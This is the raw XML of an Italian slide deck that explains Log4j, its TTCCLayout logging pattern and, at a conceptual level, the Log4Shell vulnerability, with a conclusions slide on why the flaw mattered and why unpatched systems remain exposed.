              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3400" dirty="0"/>
              <a:t>Mitigazioni </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1119526983"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3074177" y="40452"/>
            <a:ext cx="33552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Log4j</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1019B6-A36F-4404-82D8-F6B8254F8C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="745277" y="685925"/>
            <a:ext cx="3896411" cy="3896411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sottotitolo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B50CFE0A-6628-3889-1FCC-286B3CF445AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641687" y="1302241"/>
            <a:ext cx="4120649" cy="3007366"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Framework di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> open source scritto in Java e distribuito da Apache Software Foundation usato per tenere traccia dell’attività del software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presente su circa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>3 miliardi di dispositivi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Usato anche da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Ingenuity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, l’elicottero Linux-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> che vola su Marte.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2356442" y="181025"/>
            <a:ext cx="427209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err="1"/>
              <a:t>Conclusioni</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>19</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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7" name="Google Shape;214;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE01554-7F1F-5B53-AED1-A28E4F510062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="1140928"/>
            <a:ext cx="7154278" cy="141708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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Log4Shell è una delle vulnerabilità più importanti degli ultimi anni in quanto:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>È semplice da sfruttare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Consente accesso completo al server vittima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il numero di potenziali vittime era elevatissimo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;214;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A30CDE-A999-307B-B9C8-A2DAABA3F84B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="2727593"/>
            <a:ext cx="7154278" cy="141708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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent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accent1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Con le ultime versioni di Log4j la vulnerabilità è stata mitigata tuttavia ancora oggi ci sono alcuni software che non hanno effettuato gli aggiornamenti di sicurezza e che sono quindi ancora vulnerabili a Log4Shell.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2"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42104697"/>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FC43CE73-2A56-4872-B1CF-B91CF2B9CEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1587105" y="2210985"/>
            <a:ext cx="5969789" cy="721529"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3600" dirty="0"/>
              <a:t>Grazie per l’attenzione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970122614"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065338" y="40452"/>
            <a:ext cx="33552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Log4j</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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3" name="Sottotitolo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B50CFE0A-6628-3889-1FCC-286B3CF445AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="1126938"/>
            <a:ext cx="7310681" cy="3381451"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Log4j produce gli eventi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> usando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>TTCCLayout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> seguendo il pattern:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
              <a:t> [%t] %-5p %c %x – %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>m%n</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> stampa il tempo in millisecondi trascorso dal momento dell’avvio del programma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> indica il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>thread</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> la priorità dell’evento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> il contesto associato al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> che ha generato l’evento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> contiene il messaggio associato all’evento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Proprio tramite un utilizzo malevolo del campo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> è possibile sfruttare Log4j per eseguire codice malevolo sul server target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
